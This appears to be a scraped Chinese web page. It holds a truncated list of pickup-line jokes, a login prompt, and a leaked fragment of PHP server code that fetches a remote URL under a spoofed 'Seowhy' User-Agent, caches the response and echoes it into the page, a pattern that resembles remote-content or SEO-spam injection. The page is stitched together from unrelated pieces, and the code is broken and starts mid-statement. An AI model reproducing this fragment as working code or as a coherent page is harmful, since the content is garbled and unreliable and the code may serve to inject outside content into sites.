1、  “我有些害怕你…”  “为什么?”  “我怕你偷走了我的心”  2、  “你怎么又胖了?”  “什么?”  “卡在我心里抠都抠不出来”  3、  “你能帮我喜个东西么?”  “洗什么啊?”  “洗(喜)欢我”  4、  “你今天看起来有点怪”  “哪里怪?”  “怪好看的”  5、  “你知道我做事为什么十拿九稳吗?”  “为
2021-09-26 568
没有账号?注册  忘记密码?
array( "header"=>array( "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0 Seowhy", ), "method" => "GET", "timeout" => 2 ), ); $context = stream_context_create($opts); $content = @file_get_contents($url,false, $context); if (isset($http_response_header)) { if(is_array($http_response_header)){ $http_response_header = $http_response_header[0]; } if(strpos($http_response_header,"200 OK") !==false && $content != "error"){ @file_put_contents($cacheUrl, $content); echo $content; } } }else{ $content = @file_get_contents($cacheUrl); echo $content; } ?>